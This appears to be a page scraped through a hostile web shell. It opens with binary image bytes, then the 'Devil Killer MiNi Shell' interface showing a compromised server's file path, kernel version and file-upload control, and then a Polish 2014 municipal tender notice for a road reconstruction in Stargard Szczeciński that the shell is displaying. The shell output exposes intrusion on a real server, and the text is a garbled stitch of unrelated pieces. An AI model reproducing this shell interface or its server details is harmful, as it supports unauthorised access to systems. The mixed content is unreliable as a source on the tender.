JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141212/408286-N-2014.html

<p class="kh_header"><b>Stargard Szczeciński: przebudowa ulicy Spokojnej w Stargardzie Szczecińskim na odcinku od ul. Kościuszki do ul. Giżynek</b><br>
<b>Numer ogłoszenia: 408286 - 2014; data zamieszczenia: 12.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Stargard Szczeciński , ul. Stefana Czarnieckiego 17, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 091 5784881, faks 091 5784889.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przebudowa ulicy Spokojnej w Stargardzie Szczecińskim na odcinku od ul. Kościuszki do ul. Giżynek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiot  zamówienia.
1.	Nazwa przedmiotu zamówienia: przebudowa ulicy Spokojnej w Stargardzie Szczecińskim na odcinku od ul. Kościuszki do ul. Giżynek.
2.	Określenie przedmiotu zamówienia:
1)	wykonanie wszystkich niezbędnych robót związanych z przebudowę ulicy Spokojnej w Stargardzie Szczecińskim na odcinku od ul. Kościuszki do ul. Giżynek w granicach i zakresie określonymi dokumentacją projektowo-kosztorysową, w skład których wchodzą:
a)	wykonanie nowej nawierzchni bitumicznej ulicy Spokojnej oraz jej poszerzenie do 7m,
b)	budowa ronda na skrzyżowaniu ulicy Spokojnej z ulicą Kościuszki,
c)	budowa ścieżki rowerowej o nawierzchni bitumicznej,
d)	budowa chodnika z kostki brukowej - betonowej,
e)	budowa miejsc postojowych,
f)	budowa zatok autobusowych,
g)	odtworzenie istniejących zjazdów,
h)	przebudowa sieci wodociągowej z przyłączami,
i)	budowa kanalizacji deszczowej (sieć kanalizacji deszczowej, rowy drogowe infiltracyjne i skrzynki rozsączające),
j)	przebudowa i rozbudowa istniejącego oświetlenia,
k)	likwidacja kolizji z siecią energetyczną niskiego i średniego napięcia,
l)	likwidacja kolizji z siecią teletechniczną,
m)	likwidację kolizji z siecią gazową niskiego ciśnienia ,
n)	wycinka drzew kolidujących z projektowaną inwestycją,
o)	wykonanie nasadzeń zieleni,
p)	wykonanie ogrodzenia cmentarza komunalnego oraz działki przeznaczonej pod pas drogowy,
q)	wykonanie oznakowania stałej organizacji ruchu.
r)	inne roboty ujęte w przedmiarach robót;
oraz
s)	wszelkie inne, nie wymienione w lit. a) - r), roboty i prace niezbędne dla osiągnięcia zamierzonego projektem budowlanym celu (rezultatu technicznego, funkcjonalnego i użytkowego) - dla uznania, że roboty takie nie wykraczają poza określenie przedmiotu zamówienia muszą być one wykonywane w granicach określonych projektem budowlanym, a ich rodzaj nie wykracza tematycznie i branżowo poza zakres zagadnień określonych dokumentacją projektową i przedmiarem robót

2)	za roboty nie wykraczające poza określenie przedmiotu zamówienia uznaje się również roboty wykonywane w sposób zamienny pod względem technologii, zastosowanych materiałów lub urządzeń od sposobu określonego w dokumentacji projektowo-kosztorysowej, których zasadność wykonania w sposób zamienny wyniknie w trakcie realizacji zamówienia z korzystnych dla Zamawiającego przesłanek, takich jak: polepszenie parametrów techniczno-jakościowo-funkcjonalnych przedmiotu zamówienia, obniżenie kosztów eksploatacyjnych lub innych uwarunkowań racjonalnego stosowania zasad sztuki budowlanej - pod warunkiem, że realizacja robót zamiennych nie ma na celu naruszenia zasad uczciwej konkurencji i równego traktowania,
3)	roboty ujęte w przedmiarach robót, w ilościach rzeczywistych przekraczających ilości założone   przedmiarami robót - są robotami mieszczącymi się w przedmiocie zamówienia podstawowego i nie wykraczającymi poza określenie przedmiotu zamówienia -  o ile ich wykonanie niezbędne jest dla osiągnięcia zamierzonego projektem budowlanym celu (rezultatu),
4)	wszystkie roboty nie przewidziane w cenie oferty (a w tym roboty nie ujęte w przedmiarach robót) są robotami dodatkowymi. Roboty dodatkowe nie wykraczające poza określenie przedmiotu zamówienia są tym samym objęte przedmiotem zamówienia, a ich wykonanie odbywa się w ramach zamówienia podstawowego (w ramach umowy podstawowej). Zamówienie dodatkowe to zamówienie, którego przedmiot wykracza poza określenie przedmiotu.

3.	Opis przedmiotu zamówienia:  
1)	droga klasy Z. Jezdnia kategorii ruchu - KR3. Szerokość jezdni 7,00m Rondo czterowlotowe o średnicy zewnętrznej  35 m.
2)	przedmiot zamówienia obejmuje również przebudowę sieci wodociągowej z przyłączami - zadanie to realizowane będzie w imieniu i na rzecz Miejskiego Przedsiębiorstwa Gospodarki Komunalnej sp. z o.o. w Stargardzie Szczecińskim, które będzie płatnikiem tej części zamówienia,
3)	szczegółowy opis przedmiotu zamówienia określony jest przez projekty budowlane, specyfikacje techniczne (ST) oraz przedmiary robót,
4)	szczegółowy opis przedmiotu zamówienia, wynika ze stanu znanego Zamawiającemu na dzień wszczęcia postępowania  - rzeczywisty, niezbędny dla realizacji przedmiotu zamówienia zakres robót, mieszczący się w definicji określenia przedmiotu zamówienia,  może się różnić od zakresu opisanego dokumentacją projektowo-kosztorysową,
5)	materiały przetargowe udostępniane jedynie w formie elektronicznej należy pobierać ze strony internetowej Zamawiającego. 
6)	sposób sporządzenia oferty cenowej opisuje instrukcja sporządzenia wyceny ofertowej (kosztorysu ofertowego) - załącznik nr 3 do SIWZ,
7)	w opinii Zamawiającego, przed sporządzeniem oferty Wykonawca winien dokonać oględzin terenu budowy,
8)	jeżeli postanowienia specyfikacji technicznych w zakresie zasad rozliczania robót, jednostek obmiarowych, płatności itp.  różnią się od ustaleń SIWZ i przedmiarów robót - zastosowanie mają ustalenia SIWZ i przedmiarów robót.
9)	jeżeli postanowienia SIWZ stoją w sprzeczności z wymaganiami ST - zastosowanie mają ustalenia SIWZ.

4.	Orientacyjne wielkości ilustrujące skalę zamówienia:
a)	Jezdnia długości ~1000 m, o powierzchni ~ 8700 m2,
b)	Czterowlotowe rondo o średnicy zewnętrznej  35 m 
c)	Chodniki - powierzchnia ~ 2800 m2, 
d)	Ścieżka rowerowa o powierzchni  ~ 2000 m2.
e)	Przebudowa sieci gazowej (125 mm - 180 mm) o długości   ~ 100 mb. 
f)	Przebudowa sieci kablowej 15 kV o długości ok. ~600 mb. Przebudowa sieci kablowej 0,4kV o długości ~ 800 mb.
g)	Oświetlenie - ilość słupów oświetleniowych ~ 65 szt.
h)	Przebudowa sieci wodociągowej wraz z przyłączami (32 - 250 mm) o długości  ~ 1000 mb. 
i)	Przebudowa sieci teletechnicznej o długości ~200 m.
j)	Sieć kanalizacyjna (200 - 400 mm) o długości ~ 1100 m. .
k)	Wykonanie ogrodzenia na długości ok. ~900 mb
  
5.	Pozostałe obowiązki Wykonawcy: 
1)	Wykonawca zobowiązany jest  do:
a)	wykonywania robót zgodnie z wymogami Prawa budowlanego, obowiązującymi przepisami i normami oraz zasadami sztuki budowlanej, wymogami ochrony środowiska i bhp,
b)	właściwego zorganizowania, zabezpieczenia i oznakowania placu budowy - zgodnie z wymogami Prawa budowlanego,
c)	dokonywania własnym kosztem i staraniem wszelkich niezbędnych zgłoszeń, zajęć, wyłączeń, podłączeń i ich odbiorów,
d)	prowadzenia niezbędnych wytyczeń i pomiarów geodezyjnych,
e)	gromadzenia i wywozu materiałów rozbieranych i demontowanych oraz ich utylizacji zgodnie z właściwymi obowiązującymi przepisami. Zamawiający zastrzega sobie prawo żądania udokumentowania tych czynności,
f)	materiały odzyskane przewidziane do ponownego wbudowania zabezpiecza Wykonawca do czasu ich ponownego wbudowania. Demontowane sieci uzbrojenia podziemnego oraz nadziemnego należy przekazać właścicielowi poszczególnych sieci zgodnie z załączonymi uzgodnieniami branżowymi. Materiały drogowe pochodzące z rozbiórki - nadające się według Zamawiającego do powtórnego wykorzystania (płytki betonowe, kostka kamienna, bruk, kostka brukowa betonowa, frez, elementy rozbieranego ogrodzenia, furtki, bramy) należy dostarczyć na własny koszt w miejsce wskazane przez Zamawiającego na odległość max 10 km.,
g)	opracowania projektu tymczasowej organizacji ruchu podlegającego uzgodnieniu z Zamawiającym oraz z Miejskim Zakładem Komunikacji i zatwierdzeniu przez Starostę Stargardzkiego. Na odcinku od skrzyżowania z ul. Kościuszki do łącznika z ul. Przedwiośnie należy założyć ruch komunikacji miejskiej (jedna linia MZK - ok. 6 kursów). Na odcinku od łącznika ul. Przedwiośnie do ul. Giżynek należy przewidzieć ruch pojazdów (brak możliwości objazdów). Przy budowie ronda należy założyć połówkową przejezdność,
h)	wykonania własnym kosztem i staraniem w ramach zamówienia wszystkich prac wynikających z  projektu organizacji ruchu (Wykonawca nie ponosi opłat związanych z zajęciem pasa drogowego),
i)	realizacji innych obowiązków wynikających ze specyfikacji technicznych (ST),
j)	przedkładania inspektorowi nadzoru szczegółowych informacji o materiałach, które Wykonawca zamierza wbudować (atesty, certyfikaty, próbki, itp.) -  na co najmniej 14 dni przed zaplanowanym wbudowaniem,
k)	sporządzenia przewidzianych Prawem budowlanym właściwych planów, informacji i ogłoszeń dotyczących bezpieczeństwa pracy i ochrony zdrowia,
l)	dokonywania wszelkich niezbędnych badań i pomiarów,
m)	dostarczenia Zamawiającemu najpóźniej w dniu odbioru kompletu wszelkich niezbędnych: atestów i certyfikatów wbudowanych materiałów, 
n)	obmierzania wykonywanych robot,
o)	przedkładania Zamawiającemu niezbędnych danych rzeczowo-finansowym z przebiegu wykonywanych robót - dla potrzeb sprawozdawczości programu współfinansującego zadanie ze środków pomocowych,
p)	uczestnictwa w przeglądach gwarancyjnych oraz niezwłocznego usuwania w okresie gwarancyjnym stwierdzonych wad i usterek,
q)	poinstruowania podwykonawców (oraz ich dalszych podwykonawców) o obowiązkach i wymaganiach związanych z umowami o podwykonawstwo wynikających z SIWZ,
r)	monitorowania i egzekwowania od swoich podwykonawców obowiązku zapłaty wynagrodzenia dalszym podwykonawcom,
2)	Wykonanie - po wybudowaniu sieci kanalizacji deszczowej - przeglądu kamerą ułożonych rur; do odbioru należy przedłożyć protokół z inspekcji dokonanej kamerą, wraz z płytą CD
3)	Niezwłoczne uzupełniania w okresie 12 miesięcy od daty odbioru robót przepalonych źródeł światła oświetlenia ( w ramach zamówienia i ofertowej ceny),
4)	Pielęgnacja zieleni (drzewa, krzewy, trawniki) przez dodatkowy okres 12 m-cy (ponad 12 miesięczny   okres pielęgnacji ujęty w przedmiarze robót).
5)	Przy robotach związanych z branżą teletechniczną Wykonawca ma obowiązek zapewnić, w imieniu Inwestora, na własny koszt odpłatny nadzór z ramienia ORANGE Polska S. A. nad prowadzonymi robotami i ochroną infrastruktury teletechnicznej oraz odpłatny końcowy odbiór ze strony ORANGE Polska S. A. 
6)	Przeniesienie kolidujących z inwestycją punktów osnowy geodezyjnej wraz z wykonaniem niezbędnej dokumentacji i zatwierdzeniem w Powiatowym Ośrodku Geodezyjnym,
7)	Wykonawca zobowiązany jest do przekazania Zamawiającemu najpóźniej w dniu odbioru robót dokumentacji powykonawczej. Na dokumentacji powykonawczej naniesione będą wszystkie zmiany i odstępstwa z akceptującym wpisem projektanta. Wykonawca dostarczy Zamawiającemu  komplet niezbędnych atestów, świadectw i certyfikatów, wbudowanych materiałów budowlanych, a dla urządzeń również instrukcji użytkowania i dokumentów gwarancyjnych, protokołów wymaganych badań, pomiarów i odbiorów. Dokumentacja powykonawcza zawierać będzie również dokumentację fotograficzną wykonywanych robót, w tym szczególnie z robót podlegających zakryciu (roboty zanikowe oraz zakrywane instalacyjne),
8)	Inwentaryzacja geodezyjna  - Wykonawca sporządzi i dostarczy Zamawiającemu nie później niż 7 dni od dnia odbioru powykonawczą mapę geodezyjną przyjętą do państwowych zasobów geodezyjno-kartograficznych w 6 egz. Dodatkowo Wykonawca przekaże Zamawiającemu: a)	 operat geodezyjny zawierający mapę powykonawczą  w formie zapisu cyfrowego - plik w formacie EWMAPA lub DXF lub DWG w układzie współrzędnych 2000 oraz w układzie współrzędnych 65 oraz, b) w formie elektronicznej w formacie PDF, mapę w takiej skali, która  będzie odzwierciedlała widoczność i uszczegółowienie powykonawczej mapy geodezyjnej jaka będzie przekazana w formie papierowej. UWAGA: Mapa powykonawcza ma zawierać dodatkowo aktualizację użytków.
9)	Wykonawca w terminie do 10 dni od dnia zawarcia umowy przedłoży Zamawiającemu do akceptacji proponowany Harmonogram Robót w zakresie rzeczowym, terminowym i finansowym  poszczególnych etapów realizacji zamówienia. Wykonawca zobowiązany jest uwzględnić zastrzeżenia Zamawiającego w zakresie  proponowanego harmonogramu pod kątem technologicznych, realnych możliwości dochowania terminu końcowego zakończenia robót. Harmonogram uwzględniać będzie etapowość wykonywania robót: a) budowa ronda u zbiegu ul. Spokojnej i Kościuszki, b) przebudowa drogi na odcinku od ronda do łącznika z ul. Przedwiośnie, c)	przebudowa drogi na odcinku od łącznika z ul. Przedwiośnie do ul. Giżynek,
10)	Inne obowiązki wynikające z treści umowy (załącznik nr 6).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy o maksymalnej wartości nie przekraczającej 30 % wartości zamówienia podstawowego. Ewentualne zamówienie uzupełniające polegać będzie na  wykonaniu wszystkich lub części robót tego samego rodzaju, co objęte niniejszym zamówieniem (podstawowym). Zamówienie uzupełniające będzie związane technologicznie, funkcjonalnie lub użytkowo, bezpośrednio lub pośrednio z zamówieniem podstawowym. Zamówienie uzupełniające może polegać np. na budowie wzdłuż drogi będącej przedmiotem zamówienia ścieżki rowerowej   Możliwość udzielenia zamówienia uzupełniającego jest jedynie prawem Zamawiającego - nie stanowi żadnego wiążącego zobowiązania.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.21-3, 45.23.32.20-7, 45.23.32.22-1, 45.23.31.28-2, 45.23.24.10-9, 45.23.24.54-9, 45.23.14.00-9, 45.31.61.00-6, 45.23.12.20-3, 45.23.13.00-8, 45.23.23.10-8, 77.33.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane jest wniesienie wadium w wysokości 150 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie ubiegać się może Wykonawca, który wykaże zrealizowanie, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, co najmniej dwóch robót polegających na budowie lub przebudowie dróg o kategorii ruchu nie mniejszej niż będącej przedmiotem zamówienia (KR3) o wartości nie mniejszej niż 6 000 000 PLN brutto każda. Dopuszcza się uwzględnianie (sumowanie) robót realizowanych na podstawie odrębnych zamówień (podstawowych, uzupełniających, dodatkowych) pod warunkiem, że są one elementem jednego przedsięwzięcia inwestycyjnego. Ocena spełnienia tego warunku, według reguły spełnia/nie spełnia, dokonana zostanie na podstawie treści przedłożonego wykazu wykonanych robót w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju  i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót (wystawionych przez ich odbiorcę), określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. W wykazie należy wskazać jedynie roboty, które odpowiadają rodzajowo i wartościowo określonym powyżej robotom wykazywanym dla spełnienia warunku wiedzy i doświadczenia. Zamawiający wymaga aby do wykazu załączyć dowody (poświadczenie) do co najmniej dwóch wymaganych robót. Zamawiający nie wymaga wskazywania w wykazie informacji o robotach (zamówieniach) niewykonanych lub wykonanych nienależycie. Do przedkładanych dowodów zastosowanie mają przepisy § 1 ust. 2, 3 oraz 5 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013 r., poz.231). Uwaga: warunek wiedzy i doświadczenia nie podlega sumowaniu - oznacza to, że albo Wykonawca składający ofertę wykaże się realizacją dwóch wymaganych robót, albo jeden z uczestników konsorcjum wykaże się realizacją dwóch wymaganych robót (warunek wiedzy i doświadczenia nie będzie spełniony, jeżeli wszyscy uczestnicy konsorcjum w sumie wykażą zrealizowanie dwóch robót, ale żaden z nich nie wykonał wymaganych dwóch robót), albo, w sytuacji gdy Wykonawca, który nie ma wymaganego doświadczenia (nie ma wykonanych dwóch robót) polega na zasobach innego podmiotu - podmiot ten musi wykazać zrealizowanie dwóch wymaganych robót. Wykonawca, który nie ma wymaganego doświadczenia (nie ma wykonanych dwóch wymaganych zamówień) polega na zasobach innego podmiotu - podmiot ten musi wykazać zrealizowanie dwóch wymaganych zamówień. W sytuacji polegania na zasobach innego podmiotu - podmiot ten musi być wskazany jako podwykonawca, który będzie wykonywał roboty wskazane jako roboty zastrzeżone do osobistego wykonania (patrz pkt.2 ppkt 9). Udostępnienie zasobów wiedzy i doświadczenia musi być związane z wykonywaniem robót.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie ubiegać się może Wykonawca, który posiada lub dysponuje: a) sprawną wytwórnią mieszanek mineralno-asfaltowych o wydajności min. 100t/godz. ,b) sprawnym rozściełaczem do asfaltu o szer. roboczej min. 7,0 m. Pod pojęciem  dysponowania wymaganym sprzętem Zamawiający uznaje: posiadanie przez Wykonawcę stałej lub czasowej umowy użyczenia sprzętu od innego podmiotu; posiadanie stałej lub czasowej umowy o współpracy z innym podmiotem - współpracy polegającej na możliwości korzystania z wymaganego sprzętu; pisemną deklarację innego podmiotu będącego właścicielem wytwórni mieszanek o zobowiązaniu się do dostarczania mas mineralno-asfaltowych Wykonawcy w przypadku jeżeli temu Wykonawcy zostanie udzielone zamówienie będące przedmiotem niniejszego postępowania. Ocena spełnienia tego warunku, według reguły spełnia/nie spełnia, dokonana zostanie na podstawie treści przedłożonego wykazu urządzeń wraz z informacją o podstawie do dysponowania tymi zasobami oraz, w przypadku dysponowaniem urządzeń innego podmiotu, załączeniem dokumentów   potwierdzających udostępnienie (umowy, deklaracje, itp.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie ubiegać się mogą Wykonawcy, którzy dysponują osobą, która będzie pełnić funkcję kierownika budowy, posiadającą właściwe uprawnienia budowlane uprawniające do kierowania robotami drogowymi z co najmniej 3-letnim doświadczeniem w kierowaniu robotami drogowymi. Ocena spełnienia tego warunku, według reguły spełnia/nie spełnia, dokonana zostanie na podstawie treści przedłożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, informacją o podstawie do dysponowania tymi osobami oraz oświadczenia, że wskazana osoba posiada wymagane uprawnienia budowlane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

